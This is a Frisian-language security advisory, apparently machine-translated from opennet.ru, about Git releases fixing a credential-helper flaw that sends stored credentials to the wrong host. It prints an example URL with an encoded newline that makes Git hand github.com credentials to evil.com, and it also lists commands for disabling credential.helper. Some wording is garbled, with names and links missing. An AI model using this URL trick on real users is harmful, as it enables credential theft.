korrektive releases fan it ferspraat boarne kontrôle systeem Git 2.26.1, 2.25.3, 2.24.2, 2.23.2, 2.22.3, 2.21.2, 2.20.3, 2.19.4, 2.18.3 en 2.17.4, yn dy't eliminearre () yn de handler"", wat soarget dat bewiisbrieven nei de ferkearde host stjoerd wurde as in git-kliïnt tagong hat ta in repository mei in spesjaal opmakke URL mei in nijline-karakter. De kwetsberens kin brûkt wurde om te regeljen dat bewiisbrieven fan in oare host wurde stjoerd nei in server kontrolearre troch de oanfaller.
By it opjaan fan in URL lykas "https://evil.com?%0ahost=github.com/", sil de credential-handler by it ferbinen mei de host evil.com de autentikaasjeparameters oantsjutte foar github.com trochjaan. It probleem komt foar by it útfieren fan operaasjes lykas "git clone", ynklusyf it ferwurkjen fan URL's foar submodules (bygelyks "git submodule update" sil automatysk de URL's ferwurkje dy't spesifisearre binne yn it .gitmodules-bestân fan it repository). De kwetsberens is it gefaarlikst yn situaasjes dêr't in ûntwikkelder in repository kloan sûnder de URL te sjen, bygelyks by it wurkjen mei submodules, of yn systemen dy't automatyske aksjes útfiere, bygelyks yn pakketbouskripts.
Om kwetsberens yn nije ferzjes te blokkearjen it trochjaan fan in newline-karakter yn alle wearden dy't wurde oerbrocht fia it referinsjeprotokol. Foar distribúsjes kinne jo de frijlitting fan pakketfernijings op 'e siden folgje , , , , , , .
As in oplossing om it probleem te blokkearjen Brûk credential.helper net by tagong ta iepenbiere repositories en brûk gjin "git clone" yn "--recurse-submodules" modus mei net kontrolearre repositories. Om folslein útskeakelje de credential.helper handler, dat docht en it opheljen fan wachtwurden út , beskerme of in bestân mei wachtwurden, kinne jo de kommando's brûke:
git config --unset credential.helper
git config --global --unset credential.helper
git config --system --unset credential.helper
Boarne: opennet.ru